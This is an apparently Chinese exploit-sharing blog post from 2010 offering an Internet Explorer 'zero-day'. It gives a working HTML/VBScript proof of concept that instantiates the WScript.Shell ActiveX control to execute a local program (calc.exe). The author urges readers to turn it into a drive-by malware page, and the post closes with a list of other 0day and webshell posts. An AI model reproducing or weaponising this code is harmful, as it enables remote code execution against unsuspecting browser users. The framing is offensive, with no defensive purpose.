又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)

2010, January 24, 2:08 PM. oday收藏
Submitted by admin

来源:坏人咖啡的窝

这段代码在SP3+IE6下测试成功

测试代码:


<html>

<p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</font></b></p>

<p>

<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>

<script language='vbscript'>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1

</script></p>

有兴趣的同学可以回去搞一下,弄个网马出来!

-----------------------

代码保存为html格式的,本地运行了下,还能跳出计算器,很强大,我的补丁都打了。。。

Tags: oday, ie

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16095, 评论: 0)
V5-SHOP商城0day (浏览: 9536, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12077, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16027, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11762, 评论: 0)
良精所有产品通杀 (浏览: 8918, 评论: 0)
shopwind oday 分析 (浏览: 9081, 评论: 0)
云起企业建站系统通杀oday (浏览: 11190, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12199, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):